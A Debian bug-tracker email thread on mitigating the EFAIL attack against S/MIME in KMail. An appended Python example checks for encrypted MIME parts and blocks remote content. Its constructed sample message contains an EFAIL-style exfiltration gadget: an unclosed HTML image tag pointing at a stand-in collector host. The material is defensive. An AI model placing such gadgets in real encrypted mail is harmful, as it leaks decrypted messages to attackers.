Bug#898634: kmail: efail attack against S/MIME
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On Wed, 2018-05-16 at 11:44 +0200, Sandro Knauß wrote:
> Hey,
Hi Sandro, thanks for the update on this.
>
> For S/MIME the situation is that it is a conceptual weakness in the standard
> to remove the target vector completely.
Agreed, and I'm unsure what we can do about it in Debian right now, besides
mitigation for backchannels.
>
> In KMail we have the best handling that we can get at the moment (with default
> settings). KMail never accesses resources from the internet without asking the
> user or an explicit change of the default setting:
> Settings > Configure KMail > Security > Reading > Allow messages to load
> external references from the Internet
Ok. Other clients like Evolution and Trojita also had an issue with DNS
prefetching which could be re-enabled in Webkit. Not sure on what library
KMail relies for HTML rendering but it might be worth checking that too?
See https://bugs.webkit.org/show_bug.cgi?id=182924 for the webkit bug (with
links to the Evolution and Trojita ones).
>
> There are some small patches, that disable this setting for encrypted
> messages, to enforce a user interaction:
>
> https://phabricator.kde.org/D12391
> https://phabricator.kde.org/D12393
> https://phabricator.kde.org/D12394
>
> For me applying the patches makes sense to improve security for users, but
> disabling the external resource loading completely would break workflows.
> Those patches are applied for the following Debian packages, where the setting
> is used for everything:
> libmessageviewer5 << 4:18.04.1
> kmail < 4:18.04.1
Thanks, that's good to know.
>
> As already mentioned, the underlying problem is the S/MIME conceptual
> weakness, that can't be fixed by those patches.
>
> The stack KMail is using for decryption is GPGME Qt backend that is packaged
> in gpgme1.0 for testing/sid and gpgmepp for stable and older.
>
> I'm not sure, how this should be handled in Debian correctly.
I'm not sure either, to be honest.
>
> For a more detailed look for KMail and EFail see the dot.kde article:
>
> https://dot.kde.org/2018/05/15/efail-and-kmail
That article indicates KMail uses GnuPG for S/MIME, which I find a bit weird.
- --
Yves-Alexis
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCAAdFiEE8vi34Qgfo83x35gF3rYcyPpXRFsFAlr8AQkACgkQ3rYcyPpX
RFvIOQf/YLo7d/Fgy8CCPYH+rwiS0A+EwzXQZhCCykF4nk9lGH3uwQHGa9a4UdJT
FuCBu3krxPUymczIsT+p0XCUBuindZ8wknMzkqJ9rRXGN0L3634Cau7CgSA4e84H
bG1EMMfWxx2wwAjaK3dAXHF4gAUXRVfpKMdJEpidFiXZ9ixZtCKSyhM2AaF+IYli
I8kVG6gzOxrEwo+2BbQOjo+e25be19HoktnQAFbBEafVIwcjQSrop5Y4A6cXkJ5P
CT0tzc+VloCIgDwQHEkUCyM3rXJbkklgZWmTXhhDU1lMteZixnXU5uB2Gc5akW4q
alumMVM6AXu9NzAe+PioFrChglkixQ==
=2SgF
-----END PGP SIGNATURE-----
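The mitigation discussed in the thread (the "load external references" setting is never honoured for a message that carries an encrypted part, so a decrypted body cannot silently fetch attacker-chosen URLs) can be illustrated with a small MIME policy check. The following is an added example written for this page; it is not KMail's code, not the KDE patches linked above, and not GPGME. The function names, the `external_loading_allowed` policy, and the sample message (a constructed HTML part wrapping a dummy blob labelled as S/MIME enveloped data, not real CMS ciphertext) are all assumptions made here for illustration.

```python
"""
Added example (not KMail's or KDE's code): a MIME policy check that
mirrors the behaviour described in the thread. It parses a message,
collects external http(s) references from its HTML parts, and refuses
external loading outright when the message also contains an encrypted
part, regardless of the user's "allow external references" setting.
"""
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Content types that indicate an encrypted payload (S/MIME and PGP/MIME).
ENCRYPTED_TYPES = {
    "application/pkcs7-mime",
    "application/x-pkcs7-mime",
    "multipart/encrypted",
}

# Crude but sufficient scanner for external references inside HTML:
# src=/href= attributes and CSS url(...) pointing at http(s).
EXT_REF_RE = re.compile(
    r'''(?:src|href)\s*=\s*["']?(https?://[^"'\s>]+)|url\(\s*["']?(https?://[^"')\s]+)''',
    re.I,
)


def parse_message(raw: bytes) -> EmailMessage:
    """Parse raw RFC 5322 bytes with the modern email policy."""
    return BytesParser(policy=policy.default).parsebytes(raw)


def has_encrypted_part(msg: EmailMessage) -> bool:
    """True if any MIME part of the message is an encrypted container."""
    for part in msg.walk():
        if part.get_content_type() in ENCRYPTED_TYPES:
            return True
        # S/MIME may also signal encryption via the smime-type parameter.
        if part.get_param("smime-type", header="content-type") == "enveloped-data":
            return True
    return False


def external_references(msg: EmailMessage) -> list:
    """Collect every external http(s) reference found in text/html parts."""
    refs = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for m in EXT_REF_RE.finditer(part.get_content()):
            refs.append(m.group(1) or m.group(2))
    return refs


def external_loading_allowed(msg: EmailMessage, user_setting_allow: bool) -> bool:
    """Policy (hypothetical name): the user's 'allow external references'
    setting is ignored for any message that contains an encrypted part;
    such messages never load remote content without explicit interaction."""
    if has_encrypted_part(msg):
        return False
    return user_setting_allow


def build_sample() -> bytes:
    """Constructed sample: an attacker-controlled HTML part with an unclosed
    <img src="..."> sitting next to a dummy S/MIME blob. The blob is not real
    CMS data; it only carries the content type and smime-type parameter."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "constructed sample"
    msg.set_content(
        '<html><body><img src="https://collector.example.invalid/collect?',
        subtype="html",
    )
    msg.add_attachment(
        b"\x30\x82\x00\x10dummy-ciphertext",
        maintype="application",
        subtype="pkcs7-mime",
        filename="smime.p7m",
        params={"smime-type": "enveloped-data"},
    )
    return msg.as_bytes()


if __name__ == "__main__":
    sample = parse_message(build_sample())
    print("encrypted part present:", has_encrypted_part(sample))
    print("external references:", external_references(sample))
    print("load externals (user allows):", external_loading_allowed(sample, True))
```

The `external_references` output is what a client would show the user when asking for confirmation; the point of `external_loading_allowed` is that for a message with an encrypted part the answer is "no" even when the global setting says "yes", which is the behaviour the thread describes for the patched packages.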